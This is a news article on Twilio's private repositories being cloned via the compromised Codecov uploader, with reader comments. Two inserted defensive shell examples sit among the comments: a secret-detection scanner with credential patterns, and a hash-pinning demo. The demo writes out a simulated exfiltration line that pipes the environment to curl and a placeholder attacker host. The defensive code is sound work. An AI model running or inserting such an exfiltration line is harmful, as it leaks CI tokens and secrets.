Twilio's private GitHub repositories cloned by Codecov attacker, cloud comms platform confirms

Cloud comms platform Twilio has confirmed its private GitHub repositories were cloned after it became the latest casualty of the compromised credential-stealing Codecov script. Codecov, a cloud-based tool for assessing how much code is covered by software tests, revealed last month that a script called Bash Uploader had been …

  1. 142

    Jesus H...

    See title.

  2. yetanotheraoc

    notable aspect

    "A notable aspect of Twilio's report is what it says under the heading "What are we doing to prevent similar issues in the future?" The company said it evaluates its suppliers for security, and has developed a service called Deadshot that scans GitHub pull requests to prevent secrets or insecure code being committed to its repository."

    Masterful restraint on the part of the author, Tim Anderson. Notable aspect indeed. I wrote a whole bunch more but then deleted it, because everybody here, unlike Codecov, Twilio, et al, already sees the issue with complete clarity.
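As an added example (this is not Deadshot, nor any Twilio or Codecov code), here is a minimal version of the kind of pull-request check the quoted paragraph describes: read a unified diff, look only at added lines, and refuse the change when one of them looks like a credential. The two diffs are constructed for the demo, and the patterns are a small illustrative set, not a complete secret-detection ruleset.

```shell
#!/bin/sh
# Added example: block pull requests whose added lines look like secrets.
# Not Deadshot's code; the diffs and patterns below are constructed for the demo.
set -eu

# scan_diff_for_secrets: read a unified diff on stdin, print every added line
# (leading "+" stripped) that matches a credential pattern. Exit status 1 when
# anything matched, 0 when the diff is clean. "+++ b/file" headers are skipped.
scan_diff_for_secrets() {
    # Illustrative patterns: AWS access key id, PEM private key header, and a
    # TOKEN/SECRET/PASSWORD assignment with a long literal value.
    _pat="AKIA[0-9A-Z]{16}|BEGIN [A-Z ]*PRIVATE KEY|[A-Za-z_]*(TOKEN|SECRET|PASSWORD|[Tt]oken|[Ss]ecret|[Pp]assword)[A-Za-z_]*[[:space:]]*[=:][[:space:]]*[\"']?[A-Za-z0-9_/+-]{16,}"
    _hits="$(grep -E '^\+[^+]' | sed 's/^+//' | grep -E "$_pat" || true)"
    if [ -n "$_hits" ]; then
        printf '%s\n' "$_hits"
        return 1
    fi
    return 0
}

# Constructed PR diffs (not real Twilio or Codecov changes).
clean_diff='diff --git a/ci/upload.sh b/ci/upload.sh
--- a/ci/upload.sh
+++ b/ci/upload.sh
@@ -1,2 +1,3 @@
 #!/bin/sh
+set -eu
 ./uploader.sh'

leaky_diff='diff --git a/ci/upload.sh b/ci/upload.sh
--- a/ci/upload.sh
+++ b/ci/upload.sh
@@ -1,2 +1,3 @@
 #!/bin/sh
+export CODECOV_TOKEN="0123456789abcdef0123456789abcdef"
 ./uploader.sh'

# Usage: the clean diff passes, the leaky one is reported and rejected.
printf '%s\n' "$clean_diff" | scan_diff_for_secrets && echo "clean diff: accepted"
printf '%s\n' "$leaky_diff" | scan_diff_for_secrets || echo "leaky diff: rejected"
```

In a real pipeline this would run on `git diff base...head` for every pull request and fail the check, which is the point of the quoted paragraph: the scan has to happen before the secret lands in history, because once a token is in a repository that later gets cloned, rotating it is the only remedy.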

  3. HildyJ Silver badge
    Facepalm

    How many times?

    Devs need to realize that securing inputs is not just about preventing malicious data from entering their app.

    The way the Linux ecosystem is set up, the security has to extend to preventing malicious code from coming in via third party apps that you use to build your app.
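One concrete form of the control the comment above is asking for, added here as an example rather than anything from the article, Codecov or the commenters: instead of piping a vendor's build script straight from the network into a shell, keep a reviewed copy's SHA-256 pinned in the repository and refuse to execute the script when its digest no longer matches. The uploader script and the simulated tamper are constructed for the demo, and the pinned digest is whatever the reviewed copy hashes to at the time it is recorded.

```shell
#!/bin/sh
# Added example, not code from the article, Codecov or any commenter: gate a
# third-party build script on a pinned SHA-256 instead of piping it from the
# network into a shell. The uploader script and its tamper are constructed for
# the demo; the pinned digest is computed from the reviewed copy.
set -eu

workdir="$(mktemp -d)"
trap 'rm -rf "$workdir"' EXIT

# Portable SHA-256 of a file (GNU coreutils sha256sum or BSD/macOS shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# run_pinned <script> <expected-sha256>: execute the script only when its
# digest equals the value recorded at review time; otherwise refuse (exit 1).
run_pinned() {
    _actual="$(sha256_of "$1")"
    if [ "$_actual" != "$2" ]; then
        printf 'refusing to run %s: sha256 %s does not match pinned %s\n' "$1" "$_actual" "$2" >&2
        return 1
    fi
    sh "$1"
}

# demo: pin a reviewed copy, confirm it runs, then simulate an upstream tamper
# and confirm the pinned check blocks it. Prints "ok" when both hold.
demo() {
    _script="$workdir/uploader.sh"
    # Constructed stand-in for a vendor-supplied uploader (not Codecov's script).
    printf '%s\n' '#!/bin/sh' 'echo "uploading coverage report"' > "$_script"
    _pinned="$(sha256_of "$_script")"   # recorded once, when the script was reviewed

    run_pinned "$_script" "$_pinned" >/dev/null || return 1   # genuine copy runs

    # Simulated compromise: an appended line that would ship the CI environment
    # (and any tokens in it) to a placeholder host. It never executes here,
    # because the digest check refuses the modified file.
    printf '%s\n' 'env | curl -s -X POST --data-binary @- https://attacker.invalid/' >> "$_script"

    if run_pinned "$_script" "$_pinned" 2>/dev/null; then
        echo "tampered script ran"
        return 1
    fi
    echo ok
}

demo
```

The pin has to live with the consuming project (checked into its repository, updated only through a reviewed pull request), not be fetched from the same place as the script; a digest served next to the script is only as trustworthy as the script itself. The same check applies to any tool a CI job downloads at run time.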


Biting the hand that feeds IT © 1998–2021